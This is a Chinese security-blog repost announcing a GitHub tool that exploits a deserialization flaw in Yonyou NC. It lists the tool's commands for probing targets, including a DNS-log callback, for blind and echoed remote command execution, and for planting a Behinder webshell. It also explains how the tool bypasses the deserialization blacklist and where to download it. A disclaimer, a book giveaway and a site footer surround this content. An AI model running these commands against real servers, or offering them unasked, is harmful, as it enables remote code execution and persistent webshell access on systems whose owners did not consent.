NC反序列化漏洞payload生成

admin 2022年9月10日14:22:51安全文章评论9 views978字阅读3分15秒阅读模式

项目作者:Ghost2097221

项目地址:https://github.com/Ghost2097221/YongyouNC-Unserialize-Tools


0x01 前言

无回显的构造链直接使用的是 CC6执行命令,回显的构造链使用了DefiningClassLoader来绕过默认的黑名单,然后结合 CC6构造链进行任意代码执行。搭配了接口检测功能和URLDNS构造链判断是否存在反序列化。


0x02 接口检查功能

java -jar nc6.5.jar http://127.0.0.1 Check

NC反序列化漏洞payload生成


0x03 URLDNS构造链探测

java -jar nc6.5.jar http://127.0.0.1 urldns http://123.dnslog.cn

NC反序列化漏洞payload生成

NC反序列化漏洞payload生成

NC反序列化漏洞payload生成

0x04 无回显命令执行

java -jar yonyouNCTools.jar http://192.168.222.130 blind calc.exe

NC反序列化漏洞payload生成

NC反序列化漏洞payload生成

NC反序列化漏洞payload生成

0x05 回显命令执行

java -jar yonyouNCTools.jar http://192.168.222.130 Execute,通过 Header头传递命令。

NC反序列化漏洞payload生成

NC反序列化漏洞payload生成

0x06 落地 webshell

java -jar yonyouNCTools.jar http://192.168.222.130 UploadShell "C:UsersAdministratorPicturesCamera Roll1.jsp"

此处如果使用 java1.8运行,固定落地一个天蝎的 webshell,路径为:http://127.0.0.1/eozZEwBb.jsp,如果使用的是 java1.7运行,会重新动态编译,可以落地自定义的 webshell,路径随机。

NC反序列化漏洞payload生成

NC反序列化漏洞payload生成

NC反序列化漏洞payload生成

0x07 下载地址

1、通过项目地址下载

2、关注web安全工具库公众号,后台回复:20220910


0x04 声明

仅供安全研究与学习之用,若将工具做其他用途,由使用者承担全部法律及连带责任,作者不承担任何法律及连带责任。


推 荐 阅 读




加我微信:ivu123ivu,进送书活动群,不定时免费送书


《Python深度学习从零开始学》

NC反序列化漏洞payload生成

本书以通俗易懂的方式详细介绍深度学习的基础理论及其相关知识,同时提供图像识别、情感分析、迁移学习、人脸识别、图像风格迁移、生成对抗网络等案例引导读者入门深度学习。

原文始发于微信公众号(web安全工具库):NC反序列化漏洞payload生成

特别标注: 本站(CN-SEC.COM)所有文章仅供技术研究,若将其信息做其他用途,由用户承担全部法律及连带责任,本站不承担任何法律及连带责任,请遵守中华人民共和国安全法.
  • 我的微信
  • 微信扫一扫
  • weinxin
  • 我的微信公众号
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2022年9月10日14:22:51
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                  NC反序列化漏洞payload生成 http://cn-sec.com/archives/1290149.html

发表评论

匿名网友 填写信息

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: